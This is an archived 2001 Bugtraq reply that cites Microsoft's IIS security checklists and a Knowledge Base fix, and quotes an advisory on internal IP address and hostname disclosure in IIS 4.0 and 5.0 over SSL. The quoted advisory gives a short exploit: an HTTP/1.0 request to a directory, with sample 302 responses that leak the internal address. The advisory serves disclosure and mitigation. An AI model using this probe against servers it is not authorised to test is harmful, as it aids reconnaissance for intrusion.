The checklists for securing IIS4 and IIS5 discuss this issue. Specifically: "Disable IP Address in Content-Location The Content-Location header may expose internal IP addresses that are usually hidden or masked behind a Network Address Translation (NAT) Firewall or proxy server. Refer to Q218180 for further information about disabling this option." The referenced Knowledge Base Article contains information on how to force IIS to use the FQDN instead of the IP address. (Q218180) Internet Information Server Returns IP Address in HTTP Header (Content-Location) - http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180 "There is a value that can be modified in the IIS metabase to change the default behavior from exposing IP addresses to send the FQDN instead. This allows the IP address to be masked by the domain name." The IIS4 checklist is available here: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol utions/security/tools/iischk.asp And the IIS5 checklist here: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol utions/security/tools/iis5chk.asp Regards, Secureat_private -----Original Message----- From: Marek Roy [mailto:marek_royat_private] Sent: Tuesday, August 07, 2001 9:55 PM To: bugtraqat_private Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 GGS-AU / e-Synergies Security Advisory August 8, 2001 Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 Synopsis: e-Synergies has discovered and researched remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as Internal IP Address or Internal host name. Affected Versions: Microsoft IIS 4.0 running SSL Microsoft IIS 5.0 running SSL Description: By connecting manually to port TCP/443 (SSL) using Perl(SSLeay) or any other tools, a remote user has the ability to retrieve Internal IP address or reveal the machine's network node hostname. Exploit: 1- Browse the web site using a normal SSL browser and find any directory. I.E.: https://www.target.com/images/icon.gif 2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com: GET /images HTTP/1.0 3- The result should look like this: HTTP/1.1 302 Object Moved Location: https://192.168.1.10/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx or HTTP/1.1 302 Object Moved Location: https://netbiosname/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx Remarks: Using HTTP/1.1 instead of HTTP/1.0 will not give the same result. Credits: Marek Roy Senior IT Security Consultant Please send suggestions, updates, and comments to: GGS-AU / e-synergies, Sydney, Australia Level 9 65 York Street Sydney NSW 2001 Australia Phone: +61 2 9279 2533 Fax: +61 2 9279 2544 Email: enquiries@ggs-au.com http://www.ggs-au.com
This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 16:37:29 PDT
